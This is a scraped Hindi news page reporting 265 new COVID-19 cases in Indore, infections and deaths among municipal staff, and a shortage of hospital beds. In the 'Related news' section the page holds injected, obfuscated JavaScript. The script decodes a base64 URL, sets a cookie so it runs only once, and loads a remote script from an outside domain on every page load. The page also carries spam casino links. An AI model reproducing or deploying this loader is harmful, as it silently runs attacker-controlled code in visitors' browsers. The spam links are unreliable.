इंदौर: निगम के पीआरओ समेत 123 क्षेत्रों में 265 नए कोरोना मामलों की पुष्टि, एक दिन का सबसे बड़ा आंकड़ा

- Advertisement -
- Advertisement -

रात में जो रिपोर्ट सामने आई उसके अनुसार 123 अलग-अलग क्षेत्रों में संक्रमण फैला है। इनमें 7 ऐसे क्षेत्र हैं, जहां पहली बार संक्रमित मरीज सामने आए। इन क्षेत्र में मल्हारगंज क्षेत्र में एक बार फिर से कोरोना ब्लास्ट हुआ है। यहां सबसे ज्यादा 14 सक्रमित मिले हैं। इसके अलावा भोलेनाथ कॉलोनी और काछी मोहल्ला क्षेत्र में वायरस ने पैर पसार दिया है। कोरोना की चपेट में निगमकर्मी भी लगातार आ रहे हैं। अब निगम के पीआरओ की रिपोर्ट पॉजिटिव आई है।

Source: Facebook

इंदौर (राष्ट्र आजकल प्रतिनिधि): गौरी नगर और सविदास, विजय नगर, साउथ तुकोगंज, न्यू अग्रवाल नगर में 6-6 व्यक्ति पॉजिटिव आए हैं। इसके अलावा राज मोहल्ला, सुदामा नगर में 5-5 संक्रमित मिले हैं। मूसाखेड़ी के मयूर कॉलाेनी और परदेशीपुरा क्षेत्र, देवनगर, संपत हिल्स, हाजी नगर और हिना पैलेस में 4-4 मरीज मिले हैं। मल्हारगंज के अलावा काच्छी मोहल्ले में 11 लोग संक्रमित पाए गए हैं। इसके अलावा भोलेनाथ कॉलोनी में 10 मरीज पॉजिटिव पाए गए हैं। एमआईजी कॉलोनी के रामकृष्ण बाग में जहां 8 मरीजों में संक्रमण पाया गया है। वहीं द्वारिकापुर और सिंधी कॉलोनी में 7-7 मरीज इसकी चपेट में आ गए हैं। इसके अलावा माणिक बाग, ग्वालटोली क्षेत्र भी प्रभावित हुआ है। इंदौर में कोरोना संक्रमण लगातार पैर पसार रहा है। सोमवार देर रात फिर से 265 नए संक्रमित सामने आए हैं, जो पूरे कोरोना काल में सबसे ज्यादा आंकड़ा है। इसके एक दिन पहले ही 247 नए मरीज मिले थे। इसके पहले 16 अगस्त को 245 मरीज सामने आए थे।

एक बार फिर से कोरोना जेल तक पहुंचा है, इस बार जिला जेल एक महिला बंदी पॉजिटिव पाई गई है। महिला की हालत कुछ दिन से ठीक नहीं थी, जांच में उसके पॉजिटिव होने की पुष्टि हुई, जिसके बाद उसे अस्पताल में भर्ती करवाया गया है। इसके अलावा नगर निगम के ओएस की कोरोना से मौत के बाद अब पीआरओ भी पॉजिटिव आ गए हैं। इन्हें मिलाकर निगम के अब तक 54 कर्मचारी संक्रमित हो चुके हैं और पांच की मौत हो गई है। निगमायुक्त प्रतिभा पाल ने बताया संक्रमित कर्मचारियों के विभागों को सैनिटाइज करवाया गया है। हमारी तरफ से लगातार कर्मचारियों को समझाइश दी जा रही है कि वे कोरोनो प्रोटोकॉल का पालन करें। कोरोना संक्रमित मरीजों की बढ़ती संख्या के कारण अस्पतालों में बेड कम पड़ने लगे है। शहर के सबसे बड़े कोविड अस्पताल अरबिंदो में मरीजों को यह कहकर मना करना पड़ा कि जगह नहीं है। आईसीयू फूल चल रहे हैं। हालांकि सरकारी रिकार्ड में बेड खाली बताए जा रहे हैं। जबकि ज्यादातर अस्पतालों में मरीज को फोन पर ही बता दिया जाता है कि आईसीयू की जरूरत पड़ सकती है। इसलिए बेड खाली नहीं हैं।एमटीएच कोविड अस्पताल में सामान्य बेड की 150 बेड की क्षमता बताई गई है। इसका कोई रिकार्ड स्वास्थ्य विभाग के पास उपलब्ध ही नहीं है कि वहां कितने मरीज भर्ती हैं।

इसी तरह अरबिंदो कोविड अस्पताल में में सामान्य वार्ड के बेड की क्षमता 779 बेड मरीज भर्ती हैं। एमटीएच अस्पताल की स्थिति यह है कि यहां 60 बेड की क्षमता के तीन आईसीयू फूल है। स्थिति यह रहीं कि चौथा आईसीयू खोलना पड़ा। यहां ना सिर्फ इंदौर बल्कि आसपास के जिलों से भी गंभीर स्थिति बन रही है।

8088 मरीज कोरोना को मात देकर अपने घर लौट चुके हैं। जबकि 368 मरीजों की जान जा चुकी है। अभी भी जिले में 3217 मरीज अलग-अलग अस्पतालों में भर्ती हैं।

अब तक जिले में 1 लाख 98 हजार 865 लोगों की जांच रिपोर्ट आ चुकी हैं। इनमें 11673 लोग संक्रमित पाए गए हैं। सोमवार देर रात 3354 सैंपलों की जांच रिपोर्ट आई। इनमें से 265 लोग संक्रमित पाए गए, जबकि 3078 लोगों की रिपोर्ट निगेटिव रही। 11 मरीज रिपीट पॉजिटिव पाए गए। वहीं, चार लोगों की मौत भी हुई।

- Advertisement -

Latest news

Vavada online kazino Latvij iemaksu metodes un minimls summas.653

Vavada online kazino Latvijā - iemaksu metodes un minimālās summas ...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();

Казино Официальный сайт Pin Up Casino играть онлайн – Вход Зеркало.4768

Пин Ап Казино Официальный сайт | Pin Up Casino играть онлайн - Вход, Зеркало ...

Serise Online Casinos ohne OASIS in Deutschland.281

Seriöse Online Casinos ohne OASIS in Deutschland ▶️ SPIELEN ...

Sultan Games Как начать играть.1747

Казино Sultan Games - Как начать играть ▶️ ИГРАТЬ ...
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here